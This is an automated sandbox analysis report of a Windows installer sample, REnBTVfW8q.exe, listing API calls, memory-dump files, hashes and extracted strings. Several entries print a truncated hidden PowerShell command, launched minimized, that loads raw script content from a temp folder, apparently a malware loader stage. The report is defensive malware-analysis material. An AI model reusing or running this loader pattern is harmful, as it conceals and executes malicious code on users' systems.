                                                                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040413E), ref: 00404371
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                                              • Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
                                                                                              • Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                                              • Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19
                                                                                              APIs
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                • Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
                                                                                                • Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2972824698-0
                                                                                              • Opcode ID: 1d51c276210597c3e67e48e6bcdb0ac064f41ec5facf35c800a418dd96202cc3
                                                                                              • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                                                              • Opcode Fuzzy Hash: 1d51c276210597c3e67e48e6bcdb0ac064f41ec5facf35c800a418dd96202cc3
                                                                                              • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                              • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                              • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                              • ShowWindow.USER32(00000000), ref: 00405371
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                              • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                              • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                              • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 0040497B
                                                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 00404987
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                              Strings
                                                                                              • A, xrefs: 00404937
                                                                                              • (7B, xrefs: 00404911
                                                                                              • C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 00404964
                                                                                              • "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin, xrefs: 0040482D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$(7B$A$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
                                                                                              • API String ID: 2624150263-1474594648
                                                                                              • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                              • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                                              • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                                              • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405AE7
                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B2F
                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B52
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B58
                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B68
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-1917594349
                                                                                              • Opcode ID: 8f71284f2044867b201ebea1fcb177468b9962e057799c0ca1b0d7b92889968e
                                                                                              • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                              • Opcode Fuzzy Hash: 8f71284f2044867b201ebea1fcb177468b9962e057799c0ca1b0d7b92889968e
                                                                                              • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 004021BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
                                                                                              • API String ID: 542301482-720499180
                                                                                              • Opcode ID: 14088fa5b419b92bfb42c09fedcea510d9207fefc18800776c52cb691061a0f9
                                                                                              • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                                              • Opcode Fuzzy Hash: 14088fa5b419b92bfb42c09fedcea510d9207fefc18800776c52cb691061a0f9
                                                                                              • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                                              • GetSysColor.USER32(?), ref: 004045C2
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                                              • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                                              • SendMessageW.USER32(00000000), ref: 00404665
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                                              • SetCursor.USER32(00000000), ref: 004046E4
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                                              • SetCursor.USER32(00000000), ref: 00404700
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                              • String ID: N$YD@
                                                                                              • API String ID: 3103080414-2400581618
                                                                                              • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                              • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                                                              • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                                                              • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                                                • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                                              • wsprintfA.USER32 ref: 0040607B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
